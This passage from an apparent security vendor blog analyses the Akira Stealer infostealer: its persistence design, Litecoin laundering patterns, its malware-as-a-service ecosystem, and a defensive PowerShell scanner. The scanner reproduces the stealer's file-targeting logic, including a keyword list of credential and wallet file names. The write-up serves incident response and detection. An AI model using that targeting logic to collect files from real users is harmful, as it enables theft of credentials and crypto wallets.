",[567,11029,11030],{},"단일 구성 요소의 제거로는 충분하지 않음","을 보장합니다. ",[578,11033,601],{},"가 제거되면, 인포스틸러가 이를 재생성합니다. ",[578,11036,612],{},"가 삭제되면, JavaScript 컨트롤러가 이를 다시 다운로드하고 재배포합니다.",[526,11039,11040,11041,11044],{},"요컨대, 이 멀웨어는 전형적인 페이로드보다 ",[567,11042,11043],{},"분산 시스템","처럼 동작합니다. 생존성, 모듈성, 은닉성을 우선하는 시스템입니다.",[526,11046,11047,11048,11051],{},"이는 위협을 기회주의적 공격에서 ",[567,11049,11050],{},"복원력 있고 적응적인 플랫폼","으로 격상시키며, 방어자가 동등하게 계층화된 탐지 및 대응 전략으로 그 복잡성에 맞설 것을 요구합니다.",[740,11053,11055],{"id":11054},"_83-블루팀에-대한-함의","8.3 블루팀에 대한 함의",[526,11057,746],{},[526,11059,11060],{},"방어자와 CSOC 운영자에게, 이런 종류의 아키텍처는 문턱을 높입니다:",[630,11062,11063,11069,11084],{},[633,11064,11065,11068],{},[567,11066,11067],{},"부분적 정리는 효과가 없습니다",". 모든 노드를 식별하고 동시에 제거해야 합니다.",[633,11070,11071,11074,11075,11077,11078,11077,11080,11077,11082,2147],{},[567,11072,11073],{},"Defender for Endpoint 상관 분석","이 필수적입니다. 분석가는 전체 체인을 추적해야 합니다. ",[578,11076,601],{}," → ",[578,11079,1129],{},[578,11081,1226],{},[578,11083,580],{},[633,11085,11086,11089],{},[567,11087,11088],{},"IOC 없는 지속성","은 메모리 기반 휴리스틱, 텔레메트리 기준선 설정, 체인 기반 탐지가 핵심임을 의미합니다.",[526,11091,11092,11093,11096],{},"이것은 단순한 스틸러가 아닙니다. ",[567,11094,11095],{},"복원력 있는 멀웨어 플랫폼","이며, 단순한 위협보다 분산 시스템처럼 동작합니다. 그리고 바로 그 점이 이를 인상적이면서도 위험하게 만듭니다.",[557,11098,11100],{"id":11099},"_9-블록체인-추적-및-분석","9. 블록체인 추적 및 분석",[526,11102,562],{},[740,11104,11106],{"id":11105},"_91-litecoin-기반-멀웨어-캠페인에서-자금-분배-추적","9.1 Litecoin 기반 멀웨어 캠페인에서 자금 분배 추적",[526,11108,746],{},[526,11110,11111,11112,11115],{},"이 멀웨어 캠페인의 리버스 엔지니어링 단계에서, 우리는 스틸러가 암호화폐 유출에 사용한 여러 하드코딩된 지갑 주소를 추출했습니다. 이 Litecoin 지갑들의 온체인 활동을 추적함으로써, 의도적인 자금 세탁 전술을 시사하는 패턴을 밝혀낼 수 있었습니다. 공격자가 통제하는 지갑 ",[578,11113,11114],{},"LW6EopiZ...","는 중앙 집계 지점 역할을 합니다. 여러 피해자에게서 탈취한 자금이 이 주소로 흘러들고, 이후 여러 새 주소로 빠르게 재분배됩니다.",[526,11117,11118],{},"여기서 보이는 동작은 암호화폐 텀블링이나 믹싱 작업에 사용되는 고전적인 분할 전송(split-transfer) 패턴을 대표합니다. 각 사례에서, 전체 수신 잔액은 대략 비례하는 두 개의 아웃바운드 거래로 나뉘어 각각 다른 지갑으로 전송됩니다. 이 전략은 자금의 출처를 난독화하여 주소 클러스터링과 체인 추적을 방해하도록 설계되었습니다. 자동화된 블록체인 분석 및 위협 인텔리전스 플랫폼에 의한 탐지를 회피하는 효과적인 전술입니다.",[526,11120,11121],{},"이 세탁 동작은 거래 타이밍, 정밀한 값 분할, 주소 재사용 최소화의 조합을 활용하여, GraphSense, Chainalysis, TRM Labs 등에서 사용하는 클러스터링 알고리즘이 흔히 적용하는 휴리스틱을 우회합니다. 전체적인 의도는 고엔트로피 거래 흐름을 만들어 귀속을 혼란시키고 연결 가능성을 교란하는 것이며, 특히 자금이 결국 다른 자산으로 브리지되거나 프라이버시 중심 코인으로 교환될 때 그렇습니다.",[526,11123,11124],{},"아래 예시에서, 우리는 이 동작의 구조화된 부분 집합을 보여 줍니다. 수신 거래는 개별 피해자 전송을 나타냅니다. 이 값들은 이후 아웃바운드 흐름에 완벽하게 매핑되어, 코인이 빠르고 예측 가능하며 알고리즘적으로 분할된 지급을 통해 \"세탁\"되는 모습을 보여 줍니다.",[1418,11126,4706,11129],{"className":11127,"style":4705},[11128],"font-size-1",[1434,11130,11131,4706,11154,4706,11187,4706,11215,4706,11244],{},[1424,11132,4711,11133,4711,11137,4711,11141,4711,11144,4711,11148,4711,11151,4706],{},[1427,11134,11136],{"style":11135},"text-align: left; width: 14%;","입력 소스",[1427,11138,11140],{"style":11139},"text-align: left; width: 12%;","입력 날짜",[1427,11142,11143],{"style":11135},"입금액 (LTC)",[1427,11145,11147],{"style":11146},"text-align: left; width: 20%;","→ 공격자 지갑",[1427,11149,11150],{"style":6325},"출력 주소",[1427,11152,11153],{"style":4876},"총 출금 (LTC)",[1424,11155,4711,11156,4711,11159,4711,11162,4711,11165,4711,11172,4711,11185,4706],{},[1439,11157,11158],{},"Input_1",[1439,11160,11161],{},"2024-09-21",[1439,11163,11164],{},"0.25339198",[1439,11166,11167,11168,4711],{},"\n      ",[1706,11169,11171],{"title":11170},"LLQtaBnSAFpCFUw5cXRRka7Nvtrs4Up9bH","LLQtaBnSAF...",[1439,11173,11174,11175,11178,11179,11174,11181,11184],{},"\n      - ",[578,11176,11177],{},"LZmHkgkED..."," (0.15579078, 2024-09-26)",[723,11180],{},[578,11182,11183],{},"M8JpDsw5H7..."," (0.09760120, 2024-09-26)\n    ",[1439,11186,11164],{},[1424,11188,4711,11189,4711,11192,4711,11195,4711,11198,4711,11202,4711,11213,4706],{"style":4732},[1439,11190,11191],{},"Input_2",[1439,11193,11194],{},"2024-04-16",[1439,11196,11197],{},"1.09976044",[1439,11199,11167,11200,4711],{},[1706,11201,11171],{"title":11170},[1439,11203,11174,11204,11207,11208,11174,11210,11212],{},[578,11205,11206],{},"LgWrCAF8ED..."," (0.84304664, 2024-06-13)",[723,11209],{},[578,11211,11206],{}," (0.25671380, 2024-06-13)\n    ",[1439,11214,11197],{},[1424,11216,4711,11217,4711,11220,4711,11223,4711,11226,4711,11230,4711,11242,4706],{},[1439,11218,11219],{},"Input_3",[1439,11221,11222],{},"2024-03-06",[1439,11224,11225],{},"0.77089346",[1439,11227,11167,11228,4711],{},[1706,11229,11171],{"title":11170},[1439,11231,11174,11232,11235,11236,11174,11238,11241],{},[578,11233,11234],{},"LZL3wQcSRP..."," (0.38544673, 2024-03-04)",[723,11237],{},[578,11239,11240],{},"M8kiBpVHG3..."," (0.38544673, 2024-03-04)\n    ",[1439,11243,11225],{},[1424,11245,4711,11246,4711,11249,4711,11251,4711,11253,4711,11257,4711,11267,4706],{"style":4732},[1439,11247,11248],{},"Input_4",[1439,11250,11222],{},[1439,11252,11225],{},[1439,11254,11167,11255,4711],{},[1706,11256,11171],{"title":11170},[1439,11258,11174,11259,11235,11262,11174,11264,11241],{},[578,11260,11261],{},"LUFLTrqYpix...",[723,11263],{},[578,11265,11266],{},"La22dfH9eM...",[1439,11268,11225],{},[853,11270],{"className":11271},[856,857],[557,11273,11275],{"id":11274},"_10-akira-생태계-들여다보기-상업화된-사이버범죄-인프라","10. Akira 생태계 들여다보기 – 상업화된 사이버범죄 인프라",[526,11277,562],{},[526,11279,11280],{},"Akira는 단지 스틸러가 아닙니다. 사이버범죄를 단순화하고, 확장하며, 수익화하도록 설계된 번성하는 지하 생태계의 핵심입니다.",[740,11282,11284],{"id":11283},"_101-위협-행위자를-위한-플러그-앤-플레이-생태계","10.1 위협 행위자를 위한 플러그 앤 플레이 생태계",[526,11286,746],{},[526,11288,11289],{},"Akira 생태계는 사이버범죄가 전문화되고 서비스 주도적인 경제로 진화한 모습을 잘 보여 줍니다. 여기에는 다음이 포함됩니다:",[630,11291,11292,11302,11308,11314,11320],{},[633,11293,11294,11295,11298,11299,2040],{},"온디맨드 페이로드 생성을 위한 ",[567,11296,11297],{},"빌더 봇","(예: ",[578,11300,11301],{},"@AkiraRedBot",[633,11303,11304,11305],{},"업데이트, 기능 요청, 고객 지원을 위한 ",[567,11306,11307],{},"Telegram 채널",[633,11309,11310,11311],{},"종종 다이렉트 메시지나 Sellix 같은 익명 전자상거래 플랫폼을 통한 ",[567,11312,11313],{},"자동화된 라이선싱 및 결제 처리",[633,11315,11316,11317],{},"클립보드 하이재커, Discord 토큰 로거, 브라우저 데이터 스틸러, 심지어 랜섬웨어 애드온 같은 ",[567,11318,11319],{},"번들 모듈",[633,11321,11322,11323],{},"토글, 웹훅 입력, 아이콘 브랜딩을 허용하는 구성 인터페이스가 있는 ",[567,11324,11325],{},"맞춤형 페이로드",[526,11327,11328],{},[774,11329],{"alt":11330,"src":11331},"Akira Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797420/blog/pics/akira-stealer-v2.jpg",[740,11333,11335],{"id":11334},"_102-사이버범죄의-상업화","10.2 사이버범죄의 상업화",[526,11337,746],{},[526,11339,11340],{},"Akira의 구조는 \"멀웨어 서비스형(MaaS)\"으로의 더 넓은 움직임을 반영하며, 여기서는:",[630,11342,11343,11349,11355,11361],{},[633,11344,11345,11346],{},"공격을 개시하는 데 ",[567,11347,11348],{},"깊은 기술적 역량이 필요 없습니다",[633,11350,11351,11354],{},[567,11352,11353],{},"낮은 진입 비용","(3개월 $75, 평생 $150)",[633,11356,11357,11358],{},"Telegram을 통한 ",[567,11359,11360],{},"즉각적인 지원 및 문서화",[633,11362,11363,11366],{},[567,11364,11365],{},"커뮤니티 기여","가 정기적으로 스크립트와 기능 제안으로 Akira를 확장합니다",[526,11368,11369],{},"이 생태계는 변경 로그, UX 개선, 가격 계층, 업셀 등 정상적인 SaaS 비즈니스 모델을 그대로 닮았습니다.",[526,11371,11372],{},[774,11373],{"alt":11374,"src":11375},"Akria Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797061/blog/pics/akira-stealer.jpg",[740,11377,11379],{"id":11378},"_103-스틸러를-넘어-생태계의-구성-요소","10.3 스틸러를 넘어 – 생태계의 구성 요소",[526,11381,746],{},[526,11383,11384,11386],{},[578,11385,612],{},"가 많은 공격의 심장이지만, 이 생태계는 완전한 체인을 제공합니다:",[630,11388,11389,11392,11395,11398,11401],{},[633,11390,11391],{},"PyInstaller 래퍼 같은 난독화 도구",[633,11393,11394],{},"악성 페이로드를 무해한 소프트웨어와 결합하는 파일 바인더",[633,11396,11397],{},"컴파일러, 크립터, 런타임 다형성",[633,11399,11400],{},"페이로드 전달 및 유출을 위한 호스팅 미러(예: GoFile, AnonFiles)",[633,11402,11403],{},"탈취된 자격 증명과 하드웨어 프로필을 요약하는 데이터 관리 봇",[526,11405,11406],{},[774,11407],{"alt":11408,"src":11409},"Akira Bot","https://res.cloudinary.com/c4a8/image/upload/v1749797107/blog/pics/akira-bot.jpg",[557,11411,11413],{"id":11412},"_11-akira-stealer-quickcheck-영향받은-파일","11. Akira Stealer QuickCheck 영향받은 파일",[526,11415,562],{},[740,11417,11419],{"id":11418},"_111-무엇을-위한-것인가","11.1 무엇을 위한 것인가?",[526,11421,746],{},[526,11423,11424,11425,646,11428,646,11431,646,11434,11437],{},"Akira Stealer 감염이 의심된 후에는, 시스템의 어떤 파일이 유출 위험에 처했는지 즉시 아는 것이 중요합니다. 위에 개괄된 QuickCheck PowerShell 스크립트는 Akira의 정확한 검색 로직을 복제합니다. 사용자의 ",[567,11426,11427],{},"Desktop",[567,11429,11430],{},"Documents",[567,11432,11433],{},"Downloads",[567,11435,11436],{},"OneDrive"," 폴더에서 다음 조건에 해당하는 파일을 스캔합니다:",[630,11439,11440,11456,11459],{},[633,11441,11442,11443,646,11446,646,11449,646,11452,11455],{},"파일명에 ",[578,11444,11445],{},"password",[578,11447,11448],{},"wallet",[578,11450,11451],{},"backup",[578,11453,11454],{},"token"," 같은 민감한 키워드를 포함",[633,11457,11458],{},"흔히 표적이 되는 특정 확장자(.txt, .docx, .pdf, .jpg 등)를 가짐",[633,11460,11461],{},"멀웨어가 부과한 2 MB 크기 제한 이하",[526,11463,11464,11465,11468],{},"QuickCheck는 Akira Stealer의 내부 로직에 기반한 신속한 개관을 제공하지만, 포괄적인 포렌식 도구나 전문적인 인시던트 대응을 ",[567,11466,11467],{},"대체하지는 않습니다",". 확인된 침해를 다룰 때는 항상 더 깊은 분석으로 후속 조치를 취하십시오.",[526,11470,11471,11472,646,11475,646,11478,646,11481,11484],{},"이후 ",[567,11473,11474],{},"파일명",[567,11476,11477],{},"상대 경로",[567,11479,11480],{},"크기 (KB)",[567,11482,11483],{},"트리거 키워드","로 정렬된 표를 제시합니다.",[847,11486,11487],{},[526,11488,11489,11492,11493,11496,11497,11500],{},[567,11490,11491],{},"면책 조항","\n이 도구는 완전성이나 특정 목적 적합성에 대한 어떤 보증 없이 ",[567,11494,11495],{},"\"있는 그대로\""," 제공됩니다. 잠재적으로 민감한 ",[567,11498,11499],{},"모든"," 파일의 탐지를 보장하지 않으며, 완전한 멀웨어 포렌식을 대체하지도 않습니다. 사용에 따른 위험은 본인이 부담합니다.",[853,11502],{"className":11503},[856],[740,11505,514],{"id":11506},"법적-고지",[526,11508,746],{},[526,11510,11511,11512,11515,11516,2147],{},"이 QuickCheck 유틸리티는 ",[567,11513,11514],{},"방어적 보안"," 평가 전용입니다. 소유하지 않은 시스템에 대한 무단 스캔이나 사용은 프라이버시, 저작권, 컴퓨터 오용 관련 법률을 위반할 수 있습니다. glueckkanja AG는 그 사용으로 인한 오용이나 손해에 대해 ",[567,11517,11518],{},"어떠한 책임도 지지 않습니다",[740,11520,11522],{"id":11521},"powershell-스크립트","PowerShell 스크립트",[526,11524,746],{},[615,11526,11528],{"className":1700,"code":11527,"language":1702,"meta":530,"style":530},"\u003C#\n.SYNOPSIS\n    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n\n.DESCRIPTION\n    Scans Desktop, Documents, Downloads and OneDrive for files that:\n      • Contain one of the defined keywords in their name\n      • Have an allowed file extension\n      • Are not larger than 2 MB\n    Presents the results in a colored, tabular overview.\n\n.NOTES\n    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n#>\n\n# -------------------------------------\n# 1. Configuration\n# -------------------------------------\n$scanFolders = @(\n    \"$env:USERPROFILE\\Desktop\",\n    \"$env:USERPROFILE\\Documents\",\n    \"$env:USERPROFILE\\Downloads\",\n    \"$env:USERPROFILE\\OneDrive\"\n)\n$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n$maxSize    = 2MB\n\n# -------------------------------------\n# 2. Scan and Collect Matches\n# -------------------------------------\n$matches = [System.Collections.Generic.List[PSObject]]::new()\n\nforeach ($folder in $scanFolders) {\n    if (-not (Test-Path $folder)) { continue }\n    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n        # 2.1 Extension filter\n        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n        # 2.2 Size filter\n        if ($_.Length -gt $maxSize) { return }\n\n        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n        $hit = $null\n        foreach ($kw in $keywords) {\n            if ($_.Name.ToLower().Contains($kw)) {\n                $hit = $kw\n                break\n            }\n        }\n        if (-not $hit) { return }\n\n        # 2.4 Build relative path\n        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n\n        # 2.5 Collect\n        $matches.Add([PSCustomObject]@{\n            FileName    = $_.Name\n            Location    = $rel\n            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n            Keyword     = $hit\n        })\n    }\n}\n\n# -------------------------------------\n# 3. Display Results\n# -------------------------------------\nclear\nWrite-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\nWrite-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n\nif ($matches.Count -gt 0) {\n    $matches |\n        Sort-Object Location, FileName |\n        Format-Table -AutoSize `\n            @{Label='File';       Expression={$_.FileName}},\n            @{Label='Location';   Expression={$_.Location}},\n            @{Label='Size (KB)';  Expression={$_. 'Size (KB)'}},\n            @{Label='Keyword';    Expression={$_.Keyword}}\n\n    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n}\nelse {\n    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n}\nWrite-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\nWrite-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[578,11529,11530,11535,11540,11545,11549,11554,11559,11564,11569,11574,11579,11583,11588,11593,11598,11602,11607,11612,11616,11621,11626,11631,11636,11641,11645,11650,11655,11660,11664,11668,11673,11677,11682,11686,11691,11696,11701,11706,11711,11716,11721,11725,11730,11735,11740,11745,11750,11755,11760,11765,11770,11774,11779,11784,11788,11793,11798,11803,11808,11813,11818,11823,11828,11832,11836,11840,11845,11849,11854,11859,11864,11868,11873,11878,11883,11888,11893,11898,11903,11909,11914,11920,11925,11931,11937,11942,11948],{"__ignoreMap":530},[1706,11531,11532],{"class":1708,"line":1709},[1706,11533,11534],{},"\u003C#\n",[1706,11536,11537],{"class":1708,"line":531},[1706,11538,11539],{},".SYNOPSIS\n",[1706,11541,11542],{"class":1708,"line":2091},[1706,11543,11544],{},"    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n",[1706,11546,11547],{"class":1708,"line":2097},[1706,11548,3871],{"emptyLinePlaceholder":325},[1706,11550,11551],{"class":1708,"line":2419},[1706,11552,11553],{},".DESCRIPTION\n",[1706,11555,11556],{"class":1708,"line":2425},[1706,11557,11558],{},"    Scans Desktop, Documents, Downloads and OneDrive for files that:\n",[1706,11560,11561],{"class":1708,"line":3081},[1706,11562,11563],{},"      • Contain one of the defined keywords in their name\n",[1706,11565,11566],{"class":1708,"line":3874},[1706,11567,11568],{},"      • Have an allowed file extension\n",[1706,11570,11571],{"class":1708,"line":3880},[1706,11572,11573],{},"      • Are not larger than 2 MB\n",[1706,11575,11576],{"class":1708,"line":4129},[1706,11577,11578],{},"    Presents the results in a colored, tabular overview.\n",[1706,11580,11581],{"class":1708,"line":5054},[1706,11582,3871],{"emptyLinePlaceholder":325},[1706,11584,11585],{"class":1708,"line":5060},[1706,11586,11587],{},".NOTES\n",[1706,11589,11590],{"class":1708,"line":5066},[1706,11591,11592],{},"    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n",[1706,11594,11595],{"class":1708,"line":5072},[1706,11596,11597],{},"#>\n",[1706,11599,11600],{"class":1708,"line":5078},[1706,11601,3871],{"emptyLinePlaceholder":325},[1706,11603,11604],{"class":1708,"line":5084},[1706,11605,11606],{},"# -------------------------------------\n",[1706,11608,11609],{"class":1708,"line":5090},[1706,11610,11611],{},"# 1. Configuration\n",[1706,11613,11614],{"class":1708,"line":5096},[1706,11615,11606],{},[1706,11617,11618],{"class":1708,"line":5102},[1706,11619,11620],{},"$scanFolders = @(\n",[1706,11622,11623],{"class":1708,"line":5108},[1706,11624,11625],{},"    \"$env:USERPROFILE\\Desktop\",\n",[1706,11627,11628],{"class":1708,"line":5114},[1706,11629,11630],{},"    \"$env:USERPROFILE\\Documents\",\n",[1706,11632,11633],{"class":1708,"line":5120},[1706,11634,11635],{},"    \"$env:USERPROFILE\\Downloads\",\n",[1706,11637,11638],{"class":1708,"line":5126},[1706,11639,11640],{},"    \"$env:USERPROFILE\\OneDrive\"\n",[1706,11642,11643],{"class":1708,"line":5132},[1706,11644,5272],{},[1706,11646,11647],{"class":1708,"line":5138},[1706,11648,11649],{},"$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n",[1706,11651,11652],{"class":1708,"line":5804},[1706,11653,11654],{},"$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n",[1706,11656,11657],{"class":1708,"line":5809},[1706,11658,11659],{},"$maxSize    = 2MB\n",[1706,11661,11662],{"class":1708,"line":5814},[1706,11663,3871],{"emptyLinePlaceholder":325},[1706,11665,11666],{"class":1708,"line":5819},[1706,11667,11606],{},[1706,11669,11670],{"class":1708,"line":5825},[1706,11671,11672],{},"# 2. Scan and Collect Matches\n",[1706,11674,11675],{"class":1708,"line":5830},[1706,11676,11606],{},[1706,11678,11679],{"class":1708,"line":5835},[1706,11680,11681],{},"$matches = [System.Collections.Generic.List[PSObject]]::new()\n",[1706,11683,11684],{"class":1708,"line":5840},[1706,11685,3871],{"emptyLinePlaceholder":325},[1706,11687,11688],{"class":1708,"line":5845},[1706,11689,11690],{},"foreach ($folder in $scanFolders) {\n",[1706,11692,11693],{"class":1708,"line":5850},[1706,11694,11695],{},"    if (-not (Test-Path $folder)) { continue }\n",[1706,11697,11698],{"class":1708,"line":5855},[1706,11699,11700],{},"    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n",[1706,11702,11703],{"class":1708,"line":5861},[1706,11704,11705],{},"        # 2.1 Extension filter\n",[1706,11707,11708],{"class":1708,"line":5867},[1706,11709,11710],{},"        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n",[1706,11712,11713],{"class":1708,"line":5873},[1706,11714,11715],{},"        # 2.2 Size filter\n",[1706,11717,11718],{"class":1708,"line":5878},[1706,11719,11720],{},"        if ($_.Length -gt $maxSize) { return }\n",[1706,11722,11723],{"class":1708,"line":5883},[1706,11724,3871],{"emptyLinePlaceholder":325},[1706,11726,11727],{"class":1708,"line":5888},[1706,11728,11729],{},"        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n",[1706,11731,11732],{"class":1708,"line":5893},[1706,11733,11734],{},"        $hit = $null\n",[1706,11736,11737],{"class":1708,"line":5899},[1706,11738,11739],{},"        foreach ($kw in $keywords) {\n",[1706,11741,11742],{"class":1708,"line":5904},[1706,11743,11744],{},"            if ($_.Name.ToLower().Contains($kw)) {\n",[1706,11746,11747],{"class":1708,"line":5909},[1706,11748,11749],{},"                $hit = $kw\n",[1706,11751,11752],{"class":1708,"line":5914},[1706,11753,11754],{},"                break\n",[1706,11756,11757],{"class":1708,"line":5919},[1706,11758,11759],{},"            }\n",[1706,11761,11762],{"class":1708,"line":5924},[1706,11763,11764],{},"        }\n",[1706,11766,11767],{"class":1708,"line":5929},[1706,11768,11769],{},"        if (-not $hit) { return }\n",[1706,11771,11772],{"class":1708,"line":5935},[1706,11773,3871],{"emptyLinePlaceholder":325},[1706,11775,11776],{"class":1708,"line":5941},[1706,11777,11778],{},"        # 2.4 Build relative path\n",[1706,11780,11781],{"class":1708,"line":5947},[1706,11782,11783],{},"        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n",[1706,11785,11786],{"class":1708,"line":5953},[1706,11787,3871],{"emptyLinePlaceholder":325},[1706,11789,11790],{"class":1708,"line":5958},[1706,11791,11792],{},"        # 2.5 Collect\n",[1706,11794,11795],{"class":1708,"line":5963},[1706,11796,11797],{},"        $matches.Add([PSCustomObject]@{\n",[1706,11799,11800],{"class":1708,"line":5969},[1706,11801,11802],{},"            FileName    = $_.Name\n",[1706,11804,11805],{"class":1708,"line":5975},[1706,11806,11807],{},"            Location    = $rel\n",[1706,11809,11810],{"class":1708,"line":5981},[1706,11811,11812],{},"            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n",[1706,11814,11815],{"class":1708,"line":5987},[1706,11816,11817],{},"            Keyword     = $hit\n",[1706,11819,11820],{"class":1708,"line":5992},[1706,11821,11822],{},"        })\n",[1706,11824,11825],{"class":1708,"line":5997},[1706,11826,11827],{},"    }\n",[1706,11829,11830],{"class":1708,"line":6003},[1706,11831,2428],{},[1706,11833,11834],{"class":1708,"line":6008},[1706,11835,3871],{"emptyLinePlaceholder":325},[1706,11837,11838],{"class":1708,"line":6013},[1706,11839,11606],{},[1706,11841,11842],{"class":1708,"line":6019},[1706,11843,11844],{},"# 3. Display Results\n",[1706,11846,11847],{"class":1708,"line":6025},[1706,11848,11606],{},[1706,11850,11851],{"class":1708,"line":6031},[1706,11852,11853],{},"clear\n",[1706,11855,11856],{"class":1708,"line":6036},[1706,11857,11858],{},"Write-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\n",[1706,11860,11861],{"class":1708,"line":6042},[1706,11862,11863],{},"Write-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n",[1706,11865,11866],{"class":1708,"line":6048},[1706,11867,3871],{"emptyLinePlaceholder":325},[1706,11869,11870],{"class":1708,"line":6053},[1706,11871,11872],{},"if ($matches.Count -gt 0) {\n",[1706,11874,11875],{"class":1708,"line":6059},[1706,11876,11877],{},"    $matches |\n",[1706,11879,11880],{"class":1708,"line":6065},[1706,11881,11882],{},"        Sort-Object Location, FileName |\n",[1706,11884,11885],{"class":1708,"line":6070},[1706,11886,11887],{},"        Format-Table -AutoSize `\n",[1706,11889,11890],{"class":1708,"line":6075},[1706,11891,11892],{},"            @{Label='File';       Expression={$_.FileName}},\n",[1706,11894,11895],{"class":1708,"line":6080},[1706,11896,11897],{},"            @{Label='Location';   Expression={$_.Location}},\n",[1706,11899,11900],{"class":1708,"line":6086},[1706,11901,11902],{},"            @{Label='Size (KB)';  Expression={$_. 'Size (KB)'}},\n",[1706,11904,11906],{"class":1708,"line":11905},79,[1706,11907,11908],{},"            @{Label='Keyword';    Expression={$_.Keyword}}\n",[1706,11910,11912],{"class":1708,"line":11911},80,[1706,11913,3871],{"emptyLinePlaceholder":325},[1706,11915,11917],{"class":1708,"line":11916},81,[1706,11918,11919],{},"    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n",[1706,11921,11923],{"class":1708,"line":11922},82,[1706,11924,2428],{},[1706,11926,11928],{"class":1708,"line":11927},83,[1706,11929,11930],{},"else {\n",[1706,11932,11934],{"class":1708,"line":11933},84,[1706,11935,11936],{},"    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n",[1706,11938,11940],{"class":1708,"line":11939},85,[1706,11941,2428],{},[1706,11943,11945],{"class":1708,"line":11944},86,[1706,11946,11947],{},"Write-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\n",[1706,11949,11951],{"class":1708,"line":11950},87,[1706,11952,11953],{},"Write-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[853,11955],{"className":11956},[856,857],[557,11958,11960],{"id":11959},"_12-대응을-넘어-glueckkanja-csoc가-인시던트를-인사이트로-바꾸는-방법","12. 대응을 넘어 – glueckkanja CSOC가 인시던트를 인사이트로 바꾸는 방법",[526,11962,562],{},[526,11964,11965,11966],{},"대부분의 보안 운영 센터는 봉쇄에서 멈춥니다.\n",[567,11967,11968],{},"우리는 그렇지 않습니다.",[526,11970,11971],{},"glueckkanja CSOC에서 우리는 인시던트 대응이 결승선이 아니라 출발점이라고 믿습니다.",[526,11973,11974],{},"다른 이들이 승리를 선언하고 넘어갈 때, 우리는 더 깊이 파고듭니다. 우리에게 모든 인시던트는 배우고, 적응하며, 더 강해지는 기회입니다. 수년간의 깊은 포렌식 전문성과 리버스 엔지니어링 역량으로 뒷받침되는 우리의 끊임없는 호기심은, 우리가 단지 방어하는 데 그치지 않고 예측하도록 보장합니다.",[526,11976,11977,11978,11981],{},"이 철학이 우리가 ",[567,11979,11980],{},"Akira Compromise Reporter","를 구축한 이유입니다.",[526,11983,11984],{},"기본적인 탐지를 훨씬 넘어, 이 내부 개발 포렌식 도구는 Akira Stealer에 대한 우리의 깊은 지식을 사용하여 어떤 데이터가 침해되었는지에 대한 절대적인 명확성을 제공합니다. 몇 분 안에, 인시던트의 전체 영향에 대한 정밀하고 실행 가능한 스냅샷을 생성합니다:",[630,11986,11987,11990,11993],{},[633,11988,11989],{},"정확히 어떤 자격 증명, 토큰, 브라우저 세션이 탈취되었는지.",[633,11991,11992],{},"정확히 어떤 암호화폐 지갑, 메시징 계정, 파일이 노출되었는지.",[633,11994,11995],{},"명확하고 구조화된 상세 포렌식 보고서. 불확실성을 즉각적이고 정보에 기반한 조치로 전환합니다.",[526,11997,11998],{},[774,11999],{"alt":12000,"src":12001},"Akira Compromise Report","https://res.cloudinary.com/c4a8/image/upload/v1749796758/blog/pics/akira-compromise-report.png",[526,12003,12004],{},"glueckkanja에서 우리는 성공을 단지 차단한 위협의 수가 아니라 제공한 명확성으로 측정하기 때문입니다. 제대로 된 사이버보안은 단순히 인시던트에 반응하는 것이 아니라, 이해하고, 적응하며, 항상 한 걸음 앞서 있는 것입니다.",[526,12006,12007],{},[567,12008,12009],{},"그것이 glueckkanja CSOC의 차이입니다.",[557,12011,12013],{"id":12012},"_13-침해-지표-iocs","13. 침해 지표 (IOCs)",[526,12015,562],{},[526,12017,12018],{},"아래는 glueckkanja CSOC의 내부 리버스 엔지니어링 과정에서 멀웨어 코드로부터 직접 추출한 포괄적이고 원문 그대로의 IOC 모음입니다. 어떤 추측이나 외부 위협 인텔리전스 소스도 사용되지 않았습니다. 모든 지표는 확인된 발견 사항입니다. 모든 URL은 실수로 클릭하는 것을 방지하기 위해 의도적으로 난독화되었습니다.",[526,12020,12021],{},[567,12022,12023],{},"약어:",[630,12025,12026,12032],{},[633,12027,12028,12031],{},[567,12029,12030],{},"TG:"," Telegram 보고 채널",[633,12033,12034,12037],{},[567,12035,12036],{},"Alt:"," 대체(폴백) 엔드포인트",[740,12039,12041],{"id":12040},"_1-도메인-및-url","1. 도메인 및 